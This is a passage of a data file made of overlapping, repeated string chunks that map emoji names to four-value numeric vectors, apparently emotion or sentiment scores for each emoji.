0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\":", "0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344],", "0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132],", "0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289],", "0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23],", "0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046,", "0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27],", "0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\":", "\":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244,", "0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215],", "0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002,", "\":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191,", "0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191,", "0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22,", "0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\":", "\":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247,", "0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\":", "0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\":", "\":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155,", "0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\":", "\":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35,", "0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\":", "0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079],", "0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12,", "0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235],", "0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\":", "[0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995,", "0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063],", "\":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998,", "\":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997,", "\":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304,", "0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996,", "0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258,", "\":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002,", "0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\":", "\":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997,", "\":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002,", "0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002,", "0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998,", "0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\":", "0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34,", "[0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139,", "0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154],", "0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002,", "\":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332,", "0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\":", "0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175],", "0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994,", "\":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262,", "0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001,", "[0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21,", "[0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168,", "0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\":", "0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998,", "\":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215,", "\":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221,", "\":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231,", "[0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373,", "[0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191,", "0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\":", "0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\":", "0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\":", "0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\":", "0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003],", "0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205],", "0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213,", "\":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175,", "\":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244,", "0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134,", "0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152,", "[0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21,", "0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002,", "\":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331,", "0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997,", "0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23],", "[0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002,", "0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157,", "0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253],", "[0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146,", "0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231],", "0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\":", "0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\":", "0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292],", "0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159],", "[0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205,", "[0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999,", "0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\":", "0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\":", "[0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002,", "[0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002,", "[0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131,", "[0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996,", "0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24],", "\":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235,", "0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23,", "\":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242,", "[0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281,", "0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\":", "0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\":", "0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\":", "[0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226,", "0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099,", "\":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17,", "0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\":", "[0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128,", "\":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001,", "0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002],", "[0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314,", "0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265],", "0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001],", "\":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262,", "0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115,", "\":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999,", "\":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998,", "0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\":", "[0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998,", "[0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002,", "[0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24,", "\":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997,", "[0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172,", "0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094],", "0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23],", "0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106,", "0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002],", "\":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261,", "\":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11,", "0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086],", "[0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001,", "0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107,", "0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284],", "\":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268,", "0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\":", "0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327,", "0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222,", "\":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221,", "0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\":", "\":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276,", "0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31],", "0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998,", "[0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226,", "0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213,", "[0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284,", "\":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17,", "0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259],", "0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162,", "\":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258,", "[0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305,", "[0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049,", "\":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073,", "0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142,", "[0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998,", "0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\":", "0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166],", "0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\":", "\":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308,", "0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\":", "0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\":", "0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\":", "0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135,", "\":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048,", "\":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003,", "0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], 